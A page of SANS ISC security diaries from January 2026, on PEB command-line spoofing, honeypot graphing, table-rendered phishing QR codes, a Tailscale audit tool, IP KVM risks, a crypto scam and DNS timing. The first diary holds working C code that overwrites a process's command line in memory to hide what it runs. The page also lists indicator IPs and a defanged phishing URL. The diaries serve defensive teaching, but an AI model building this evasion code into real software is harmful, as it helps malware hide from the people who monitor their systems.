Diaries

Published: 2026-01-09

Malicious Process Environment Block Manipulation

Reverse engineers must have a good understanding of the environment where malware is executed (read: the operating system). In a previous diary, I talked about malicious code that could be executed when loading a DLL[1]. Today, I'll show you how malware can hide suspicious information related to the processes it creates.

The API call CreateProcess() is dedicated to, guess what, the creation of new processes![2] I won't discuss all the parameters here, but you should know that it's possible to specify flags that describe how the process will be created. One of them is CREATE_SUSPENDED (0x00000004). It instructs the OS to create the process but not to start its primary thread. This flag is often a good indicator of malicious intent (for example, in process hollowing).

Every process has a specific structure called the “PEB” (“Process Environment Block”)[3]. It’s a user-mode data structure in Windows that the operating system maintains for each running process to store essential runtime information such as loaded modules, process parameters, heap pointers, environment variables, and debugging flags.

The key element in the previous paragraph is user-mode. It means that a process is able to access its own PEB (for example, to detect the presence of a debugger attached to it) but also to modify it!

Let's take a practical example where a piece of malware needs to spawn cmd.exe with some parameters. We can spoof the command line by modifying the PEB in a few steps:

  1. Locate the PEB
  2. Read the process parameters
  3. Overwrite them
  4. Resume the process

Here is a proof-of-concept:

#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "ntdll.lib")

int main() {
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi;
 
    // Start a process with some parameters
    BOOL success = CreateProcessA(
        "C:\\Windows\\System32\\cmd.exe",
        (LPSTR)"cmd.exe /c echo I am malicious! }:->",
        NULL, NULL, FALSE,
        CREATE_SUSPENDED,
        NULL, NULL, &si, &pi
    );

    if (success) {
        PROCESS_BASIC_INFORMATION pbi;
        ULONG returnLength;

        // Get the PEB address
        NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength);

        // Read ProcessParameters
        PEB peb;
        ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, &peb, sizeof(PEB), NULL);

        RTL_USER_PROCESS_PARAMETERS params;
        ReadProcessMemory(pi.hProcess, peb.ProcessParameters, &params, sizeof(RTL_USER_PROCESS_PARAMETERS), NULL);

        // Overwrite the CommandLine buffer
        WCHAR newCmd[] = L"cmd.exe /c echo Nothing to see here!";
        WriteProcessMemory(pi.hProcess, params.CommandLine.Buffer, newCmd, sizeof(newCmd), NULL);
        printf("Press enter to continue and resume the process...\n");
        getchar();

        // Resume the process
        ResumeThread(pi.hThread);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
        printf("Process resumed with modified PEB.\n");
    }
    return 0;
}

Once you launch poc.exe, check the cmd.exe process in a tool like Process Explorer.

With this scenario, cmd.exe is executed with the new parameters. What about modifying a running process to hide (not spoof) its parameters?

To achieve this, the process does not have to be created in a suspended state, but it must be running! The idea is to get a handle on the process and modify its PEB:

void modifyRunningProcess(DWORD pid, const wchar_t* newCmd) {
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProcess) return;

    PROCESS_BASIC_INFORMATION pbi;
    ULONG retLen;
    NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &retLen);

    PEB peb;
    ReadProcessMemory(hProcess, pbi.PebBaseAddress, &peb, sizeof(PEB), NULL);

    RTL_USER_PROCESS_PARAMETERS params;
    ReadProcessMemory(hProcess, peb.ProcessParameters, &params, sizeof(params), NULL);

    // Overwrite the buffer (including the terminating null) and fix up
    // the Length field of the CommandLine UNICODE_STRING
    USHORT newSize = (USHORT)(wcslen(newCmd) * sizeof(WCHAR));
    WriteProcessMemory(hProcess, params.CommandLine.Buffer, newCmd, newSize + sizeof(WCHAR), NULL);
    WriteProcessMemory(hProcess, (PBYTE)peb.ProcessParameters + offsetof(RTL_USER_PROCESS_PARAMETERS, CommandLine.Length),
                       &newSize, sizeof(USHORT), NULL);

    CloseHandle(hProcess);
    printf("PEB updated for PID: %lu\n", (unsigned long)pid);
}

Be aware that this technique has an important limitation: you must replace the existing command line with one of lesser (padded with trailing spaces) or equal length, otherwise there is a risk of buffer overflow! Finally, this technique will not prevent tools like EDRs from logging the original parameters, because those are captured at process creation. Hopefully!
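One way to respect this limitation is to pad the replacement command line with trailing spaces up to the original length before writing it. Here is a small helper sketch (hypothetical code, not part of the PoC above; the function name is mine, and it is written in plain C so it can run anywhere):

```c
#include <assert.h>
#include <stdlib.h>
#include <wchar.h>

/* Hypothetical helper: build a replacement command line padded with
 * trailing spaces to exactly the original length, so the overwrite
 * never exceeds the existing buffer and no characters of the original
 * command line remain visible. Returns NULL if the replacement is
 * longer than the original. The caller frees the result. */
wchar_t *pad_command_line(const wchar_t *new_cmd, size_t orig_len) {
    size_t new_len = wcslen(new_cmd);
    if (new_len > orig_len)
        return NULL;                       /* would overflow the buffer */
    wchar_t *buf = malloc((orig_len + 1) * sizeof(wchar_t));
    if (!buf)
        return NULL;
    wcscpy(buf, new_cmd);
    for (size_t i = new_len; i < orig_len; i++)
        buf[i] = L' ';                     /* pad with spaces */
    buf[orig_len] = L'\0';
    return buf;
}
```

The padded result can then be written over the existing buffer without touching the Length field at all, since both strings occupy exactly the same number of bytes.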

[1] https://isc.sans.edu/diary/Abusing+DLLs+EntryPoint+for+the+Fun/32562
[2] https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
[3] https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 Comments

Published: 2026-01-07

Analysis using Gephi with DShield Sensor Data

I'm always looking for new ways of manipulating the data captured by my DShield sensor [1]. This time I used Gephi [2] (along with Graphviz [3]), a popular and powerful tool for visualizing and exploring relationships between nodes, to examine the relationships between the source IP, the filename, and which sensor received a copy of the file. I queried the past 30 days of data stored in my ELK [4] database, using ES|QL [5][6] in Kibana to query and export the data, and imported the result into Gephi.

This is the query I used to export the data I needed. Notice the condition event.reference == "no match": this filters out all the known researchers [7], based on a tag added by Logstash.

Kibana ES|QL Query from Analytics → Discover

FROM cowrie* 
| WHERE event.reference == "no match"
| KEEP related.ip, file.name, host.name
| WHERE file.name IS NOT NULL
| LIMIT 10000

This second example exports the source IP, file hash and filename. This query exported 2685 records for a period of 30 days of data.

FROM cowrie* 
| WHERE event.reference == "no match"
| KEEP related.ip, related.hash, file.name
| WHERE file.name IS NOT NULL
| LIMIT 10000
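Gephi imports relationships as a simple "Source,Target" edge list, so each exported record has to be split into edges before import. The following sketch shows one way to do that conversion (my own illustration, assuming a plain CSV export in the field order of the first query; the function name is mine):

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical converter: turn one exported record
 * "related.ip,file.name,host.name" into the two Gephi edge-list rows
 * "Source,Target" linking IP -> filename and filename -> sensor.
 * Returns 0 on success, -1 on a malformed record. */
int record_to_edges(const char *record, char *edge1, char *edge2, size_t cap) {
    char ip[256], file[256], host[256];
    if (sscanf(record, "%255[^,],%255[^,],%255[^,\n]", ip, file, host) != 3)
        return -1;
    snprintf(edge1, cap, "%s,%s", ip, file);   /* IP -> filename     */
    snprintf(edge2, cap, "%s,%s", file, host); /* filename -> sensor */
    return 0;
}
```

Running every exported row through a converter like this yields an edge list that Gephi's import wizard accepts directly.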

This screenshot shows one of the two groups of malware activity, which contains various files. This is the first grouping of files with multiple hashes and IP addresses for the same filename.

The second grouping of IPs, filename and hashes are all related to redtail malware. 

One of the nice things about Gephi is that you can place the cursor on a specific type of activity to show the overall relationships from that point of view and push the unselected data into the background. Using this graph and placing the cursor on IP 130.12.180.51, which uploaded files several times (large blue arrow), shows the redtail malware activity by that IP over the past 30 days, along with all the files having matching hashes.

Indicators

45.132.180.51
130.12.180.51
193.32.162.157
213.209.143.51

783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59 
59c29436755b0778e968d49feeae20ed65f5fa5e35f9f7965b8ed93420db91e5
048e374baac36d8cf68dd32e48313ef8eb517d647548b1bf5f26d2d0e2e3cdc7
dbb7ebb960dc0d5a480f97ddde3a227a2d83fcaca7d37ae672e6a0a6785631e9
d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e
3625d068896953595e75df328676a08bc071977ac1ff95d44b745bbcb7018c6f

[1] https://isc.sans.edu/diary/Analysis+of+SSH+Honeypot+Data+with+PowerBI/28872
[2] https://gephi.org/
[3] https://www.graphviz.org/download/
[4] https://github.com/bruneaug
[5] https://www.elastic.co/guide/en/elasticsearch/reference/8.19/esql-using.html
[6] https://isc.sans.edu/diary/Using+ESQL+in+Kibana+to+Queries+DShield+Honeypot+Logs/31704
[7] https://isc.sans.edu/api/threatcategory/research?json
[8] https://gephi.org/quickstart/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Published: 2026-01-07

A phishing campaign with QR codes rendered using an HTML table

Malicious use of QR codes has long been ubiquitous, both in the real world as well as in electronic communication. This is hardly surprising given that a scan of a QR code can lead one to a phishing page as easily as clicking a link in an e-mail.

No more surprising is that vendors of security technologies have, over time, developed mechanisms for detecting and analyzing images containing QR codes that are included in e-mail messages[1,2]. These security mechanisms make QR code-based phishing less viable. However, due to the “cat and mouse” nature of cybersecurity, threat actors continually search for ways of bypassing various security controls, and one technique that can be effective in bypassing QR code detection and analysis in e-mail messages was demonstrated quite well in a recent string of phishing messages which made it into our inbox.

The technique in question is based on the use of imageless QR codes rendered with the help of an HTML table. While it is not new by any stretch[3], it is not too well-known, and I therefore consider it worthy of at least this short post.

The samples of the aforementioned phishing messages that I have access to were sent out between December 22nd and December 26th, and all of them had the same basic layout, consisting of only a few lines of text along with the QR code.

Although it looks quite normal (except perhaps for being a little “squished”), the QR code itself was – as we have indicated above – displayed not using an image but rather with the help of an HTML table made up of cells with black and white background colors, as you can see from the following code.

<table role="presentation" border="0" cellpadding="0" cellspacing="0" width="180" height="180" align="center">
	<tr height="4">
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#FFFFFF"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		<td width="4" height="4" bgcolor="#000000"></td>
		...
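To give an idea of how easily such a table can be generated, here is a small sketch (my own illustration, not code recovered from the campaign) that renders one row of a QR code module matrix in the same style as the excerpt above:

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Illustration only: render one row of a QR code module matrix as HTML
 * table cells. '1' modules become black cells, '0' modules white ones,
 * mirroring the markup seen in the phishing messages. */
void emit_qr_row(FILE *out, const char *row_bits) {
    fputs("\t<tr height=\"4\">\n", out);
    for (const char *p = row_bits; *p; p++)
        fprintf(out, "\t\t<td width=\"4\" height=\"4\" bgcolor=\"%s\"></td>\n",
                *p == '1' ? "#000000" : "#FFFFFF");
    fputs("\t</tr>\n", out);
}
```

Looping a function like this over a QR encoder's module matrix produces a complete, imageless QR code with only a few lines of code, which is exactly what makes this evasion technique so cheap for attackers.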

Links encoded in all QR codes pointed to subdomains of the domain lidoustoo[.]click, and except for the very first sample from December 22nd, which pointed to onedrive[.]lidoustoo[.]click, all the URLs had the following structure:

hxxps[:]//<domain from recipient e-mail><decimal or hexadecimal string>[.]lidoustoo[.]click/<alphanumeric string>/$<recipient e-mail>

While the underlying technique of rendering QR codes using HTML tables is – as we’ve mentioned – not new, its appearance in a real-world phishing campaign is a useful reminder that many defensive controls still implicitly rely on assumptions about how malicious content is represented… And these assumptions might not always be correct.

It is also a good reminder that purely technical security controls can never stop all potentially malicious content – especially content that has a socio-technical dimension – and that even in 2026, we will have to continue improving not just the technical side of security, but also user awareness of the current threat landscape.

[1] https://www.proofpoint.com/us/blog/email-and-cloud-threats/malicious-qr-code-detection-takes-giant-leap-forward
[2] https://www.cloudflare.com/learning/security/what-is-quishing/
[3] https://media.defcon.org/DEF%20CON%2032/DEF%20CON%2032%20villages/DEF%20CON%2032%20-%20Adversary%20Vilage%20-%20Melvin%20Langvik%20-%20Evading%20Modern%20Defenses%20When%20Phishing%20with%20Pixels.pdf

-----------
Jan Kopriva
LinkedIn
Nettles Consulting


Published: 2026-01-06

Tool Review: Tailsnitch

In yesterday's podcast, I mentioned "tailsnitch", a new tool to audit Tailscale configurations. Tailscale is an easy-to-use overlay on top of WireGuard. It is probably best compared to STUN servers in VoIP, in that it allows devices behind NAT to connect directly to each other. Tailscale just helps negotiate the setup, and once the connection is established, data flows directly between the connected devices. I personally use it to provide remote assistance to family members, and it has worked great for this purpose. Tailscale uses a "freemium" model. For my use case, I do not need to pay, but if you have multiple users or a large number of devices, you may need to pay a monthly fee. There are also a few features that are only available to paid accounts.

Tailscale, like all VPN solutions, does, however, come with risks. You are exposing internal network assets, and misconfigurations can lead to unintentionally exposed hosts. I found Tailscale to be relatively straightforward to configure, but as things get more complex, it is easy to overlook some gaps in your configuration. Tailscale also offers some advanced security features that are not enabled by default. 

Tailsnitch is supposed to solve this problem. Tailsnitch is open-source software and can be found on GitHub (https://github.com/Adversis/tailsnitch). It was created by the security consulting company Adversis (https://www.adversis.io). To test it, I used the binary distribution for my ARM-based Mac. Tailsnitch can use OAuth credentials to authenticate to Tailscale. To run it:

./tailsnitch --tailscale-path /Applications/Tailscale.app/Contents/MacOS/Tailscale

This is the default configuration. I only specified the "tailscale-path". Without it, tailsnitch wasn't able to identify my copy of the tailscale binary (it is not in my path). Other options include different output formats (JSON, verbose), filtering findings by severity, and an option to automatically fix any problems, which I did not test (I am not brave enough :) ).

My first test run identified one "medium", two "low", and 13 "info" suggestions:

Medium

This was actually a nice find: Two of my systems ran out-of-date versions of Tailscale. Something I will have to fix after finishing writing this diary :)

Low

Two of my devices use keys without expiration. This isn't a great thing, but intentional in this case. These are family member systems that I need to access only rarely (a couple of times a year), and I do not want to have to maintain rotating keys. So this is a risk I am willing to accept. I appreciate the reasonable rating from tailsnitch.

Another "low" issue was that I had no ACL tests defined. This is a feature I wasn't aware of, and it was nice of tailsnitch to point it out to me. I need to look into what these tests can do for me (I am the only user of this Tailscale network, so different user restrictions are not an issue).

Info

The "Info" sections of the results pointed out some other features I wasn't aware of. But for a single-user Tailscale net, many of them are irrelevant (for example, setting up Groups for better access control). Some of the features, like more advanced logging, are only available for paid plans.

In my quick test, I found tailsnitch to be a great tool to not only identify problems with your tailscale configuration, but also to learn more about additional hardening options that are available. The tool is easy to run, and the results are presented with the necessary detail to learn more about the identified issues.

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter

2 Comments

Published: 2026-01-05

Risks of OOB Access via IP KVM Devices

Recently, a new "breed" of IP-based KVM devices has been released. In the past, IP-based KVM devices required dedicated "server-grade" hardware using IPMI. They often cost several hundred dollars per server and were only available for specific systems that supported the respective add-on cards. These cards are usually used to provide "lights out" access to servers, allowing a complete reboot and interaction with the pre-boot environment via simple web-based tools. In some cases, these IPMI tools can also be used via various enterprise/data center management tools.

The first "non-datacenter grade" device that provided similar capabilities for arbitrary systems was the "PiKVM"[1]. This device was based on a Raspberry Pi and combined various add-on cards (HDMI capture and USB device ports) to turn the Raspberry Pi into a remote access device. But even the PiKVM wasn't cheap: the hardware cost added up to around $100-$200, and fully assembled devices are available for around $300. While within reach for some hobbyists, it was still too expensive for many.

More recently, a Chinese company, Sipeed, started offering the "NanoKVM" [2]. This device offers comparable capabilities for as low as $30 for a bare-bones version ($60 for a more full-featured assembled version). The NanoKVM uses a very minimal RISC-V CPU and runs a stripped-down Linux variant providing just enough features to act as a serviceable KVM. Consumer-oriented device manufacturers like GL-INET and others have released similar devices competing directly with the NanoKVM, often offering some additional capabilities.

But turning these devices into a ubiquitous commodity has not come without problems. 

Some have accused Sipeed of installing deliberate backdoors in their devices and of delaying fixes for security vulnerabilities. Ultimately, you should never deploy a device from a vendor you do not trust. I cannot answer that question for you; you need to figure out if this is a risk you are willing to take. A device like an IP KVM will always have direct access to your system, and it will be able to intercept keystrokes and video output. Many of the alleged vulnerabilities, like insecure firmware updates, are sadly very common in consumer devices. The NanoKVM will download firmware updates from Sipeed's servers in China. It will report some system status with these requests, which again is not that unusual. Sipeed offers other products (for example, camera systems) built around the same board, which explains components like the microphone located on it. For more details, see the reports released by Tom's Hardware in December [3].

Here are some tips to consider when installing one of these devices:

1. Do not expose the device to the Internet

Just like any administrative interface, do not expose the KVM to the internet. In particular, for KVMs, there is often a need to access them remotely. After all, you could reboot the system without KVM if you are at the same location as the system. Luckily, these KVMs often support Tailscale out of the box, or can support it with simple additional installs. Tailscale provides a simple VPN and NAT bypass solution to access systems even if your IP is dynamic. Any other VPN solution will work as well, but this usually requires you to operate some kind of "bastion host" at a cloud provider if you do not want to rely on the VPN offered by your firewall/router.

2. Set up strong authentication

PiKVM at least offers MFA via one-time passwords. I have not seen much else, but this is a reasonably good solution for this purpose. Just don't forget to enable it. NanoKVM considers MFA a "TODO Item". I don't think it has been implemented yet. 

3. Configure TLS

Even running over a VPN, you should still use TLS to connect to your KVM to avoid MitM issues. This requires a valid certificate, either issued by an internal or public CA. I was able to install "certbot" without too much trouble on a PiKVM. If you are unable to automatically renew certificates, use an internal CA, which can issue certificates with a longer lifetime. But avoid self-signed certificates that are not recognized as valid by your browser.

NanoKVM specifically points out in its manual that the system is not quite able to support the full bitrate over TLS, and you may see some dropped frames. This is annoying but usually not a deal breaker for simple remote access during emergencies. It may be an issue if you use the KVM for more routine work, for example, if you attempt to use a laptop located in the US from an office in North Korea to work your remote job.

4. Logging

I wrote in the past about securing out-of-band access. One thing I see often missing, even with devices like console servers, is a decent logging or alerting solution to track use of the OOB access. At least log to a central syslog server. In some cases, I implemented little scripts that alert me of each login via SMS and e-mail. 

5. Console Access Security

Once you are using a KVM to access your system, it is important to implement authentication on the system connected to the KVM. You should have the standard login and auto-logout/screen lock features enabled, just as you would on a system sitting in an office.

6. Test

OOB systems are usually used infrequently. It is important to verify that the system is working and to configure alerts in case it is not. Sadly, it happens all too often that systems like this are "dead" for a long time, something that is only noticed during the emergency in which they are needed. Some simple monitoring scripts should check that the system is operating correctly.

 

[1] https://pikvm.org
[2] https://sipeed.com
[3] https://www.tomshardware.com/tech-industry/cyber-security/researcher-finds-undocumented-microphone-and-major-security-flaws-in-sipeed-nanokvm

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter


Published: 2026-01-04

Cryptocurrency Scam Emails and Web Pages As We Enter 2026

Introduction

In October 2025, a work colleague documented a cryptocurrency scam using a fake chatbot. After investigating this, I was able to receive messages from the campaign, and these emails have continued to land in my honeypot account since then. This diary documents the cryptocurrency scam campaign as it continues in 2026.


Shown above: My honeypot email inbox with several emails from this cryptocurrency scam campaign.

Details

This campaign promises cash payouts for cryptocurrency that potential victims supposedly hold without knowing it.

This campaign primarily abuses the minimalist publishing platform telegra[.]ph, which anyone can use to publish a simple web page very quickly. Many of these emails have minimal messaging and contain links to these telegra[.]ph pages.


Shown above: Example of an email from this campaign with link to a telegra[.]ph page.



Shown above: Example of a telegra[.]ph page from this campaign.

This campaign is not limited to abusing telegra[.]ph. Many of these emails contain Google Forms pages that lead to the telegra[.]ph page.


Shown above: Example of a Google Forms email from this campaign.


Shown above: Example of a response from the Google Forms link that leads to a telegra[.]ph page for this campaign.

These telegra[.]ph pages generally lead to the same type of cryptocurrency scam, stating you have over $100K in US dollars worth of Bitcoin from an automated Bitcoin mining cloud platform.


Shown above: Example of a page to begin the cryptocurrency scam.

In November 2025, I posted a video on YouTube, where I went through the website step-by-step, interacting with the fake chatbot to get to the actual scam. The scam involves paying a fee to convert the supposed Bitcoin to US dollars, which potential victims would send to a wallet controlled by the criminals.

Final Words

Many free services are easy to abuse for these types of campaigns. While these emails may seem obviously fake, they continue to be cost-effective for criminals to send, and criminals can easily abuse other services to host everything needed for this scam.

Bradley Duncan
brad [at] malware-traffic-analysis.net


Published: 2026-01-02

Debugging DNS response times with tshark

One of my holiday projects was to redo and optimize part of my home network. One of my homelab servers failed in November. I had only thrown the replacement in the rack to get going, but some cleanup was needed. In addition, a lot of other "layer 1" issues had to be fixed by re-crimping some network drops and doing general network hygiene. The dust-bunny kind of hygiene, not so much the Critical Controls kind. After all, I don't want things to overheat, and it is nice to see all network links syncing properly.

But aside from the obvious issues, there was a more subtle and rather annoying one: sometimes a website would take a long time to load. This happened, in particular, the first time each day I loaded a particular site, and it happened across a wide range of sites (pretty much any site). I ruled out ad filters and other security tools by temporarily disabling them. So I figured it might be time to blame DNS...

Luckily, tshark has some great tools to inspect and summarize DNS. To get started, I collected about an hour of DNS traffic on my firewall, and next, loaded it into tshark.

I started with the default "DNS statistics summary":

tshark -z dns,tree -nr dns.pcap

The output is rather verbose, so I am just highlighting some parts here

I got about the same number of queries and responses, so that part looked ok. It does not look like anything was completely off/wrong. Next, tshark summarized the DNS query types:

The first test I ran (not shown above) had a huge number of PTR record lookups. It turns out that this was my NTP server. Last year, I added one of my GPS-synced NTP servers to pool.ntp.org. It is now getting quite a bit of traffic. For whatever reason, it was configured to do reverse lookups on all connections. I do not know if I enabled this, or if this was the default (change control is for people who don't enjoy troubleshooting with tshark). The screenshot above is from after I had this feature turned off and shows a more normal distribution. tshark produces a similar breakdown for answers. The SOA, IXFR, and AXFR queries are due to some internal zones I use that are dynamically updated. My recursive nameserver has DNSSEC validation enabled, which explains the DS, DNSKEY, and NSEC/NSEC3 queries.

From a performance point of view, the last few lines of the report are most interesting:

The average response time was 33 ms, which isn't too bad. But the maximum response time was almost 8 seconds. So let's try and dive into that in more detail:

tshark calculates the response time for each DNS response, and you can filter for it, or display it, using the "dns.time" field. I went for this approach:

tshark -nr dns.pcap -Y 'dns.flags.response==1' -T fields -e dns.time -e dns.qry.name -e ip.src | sort -n

This returns the response time, the query name, and the source IP, to identify what is causing these long response times. I sorted the output by response time. The last few lines of the output (every response exceeding 7 seconds):

7.221731000    firmware.zwave-js.io    1.1.1.1
7.222681000    isc.sans.edu    75.75.75.75
7.224087000    firmware.zwave-js.io    9.9.9.9
7.225434000    firmware.zwave-js.io    75.75.75.75
7.229738000    firmware.zwave-js.io    8.8.8.8
7.655821000    ywab.reader.qq.com    8.8.8.8

The "firmware" hostname is likely related to some IoT devices, and I doubt this affects my laptop's browsing experience. qq.com is not used by me but by other family members. So that leaves isc.sans.edu (which also had a 6-second response not shown here). 

Next, I checked if all the forwarding servers I am using behaved the same. I am using 1.1.1.1, 8.8.8.8, 9.9.9.9, and 75.75.75.75 (Comcast, my ISP).

All four behaved very similarly on average:

Server        Mean (s)  Median (s)  Std Dev (s)
1.1.1.1       0.0350    0.0196      0.0381
8.8.8.8       0.0372    0.0200      0.0412
9.9.9.9       0.0366    0.0198      0.0365
75.75.75.75   0.0348    0.0200      0.0361
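For completeness, per-server figures like these can be computed directly from the exported dns.time values with a couple of small helpers (a sketch of the computation, not the exact commands I used; times in seconds):

```c
#include <assert.h>
#include <math.h>
#include <stdlib.h>

/* Sketch: summary statistics over DNS response times (in seconds), as
 * extracted with the dns.time field above. The median sorts in place. */
static int cmp_double(const void *a, const void *b) {
    double x = *(const double *)a, y = *(const double *)b;
    return (x > y) - (x < y);
}

double mean_rt(const double *v, size_t n) {
    double sum = 0.0;
    for (size_t i = 0; i < n; i++)
        sum += v[i];
    return n ? sum / (double)n : 0.0;
}

double median_rt(double *v, size_t n) {
    if (n == 0)
        return 0.0;
    qsort(v, n, sizeof *v, cmp_double);
    return (n % 2) ? v[n / 2] : (v[n / 2 - 1] + v[n / 2]) / 2.0;
}
```

Comparing mean and median is worthwhile here because a handful of multi-second outliers, like the ones listed above, drag the mean up while leaving the median untouched.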

If anything, I was surprised how close the results were to each other. I am using Comcast as an ISP, and I believe DNS servers like 1.1.1.1/8.8.8.8/9.9.9.9 likely use the same anycast infrastructure as Comcast's own servers (75.75.75.75).

Everything worth doing is also worth overdoing, so I created a quick plot of the data via gnuplot, and again, the four servers' response time is pretty much identical:

(This was close enough for me to double-check the filters.)

So what is the result? For now, the main outcome was to avoid the PTR queries from the NTP server (again, the data above was collected after). About half the queries were PTR queries, and PTR queries often fail and result in timeouts. But I am a bit in the denial phase as far as blaming DNS goes. I will let you know if I find something else.

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter
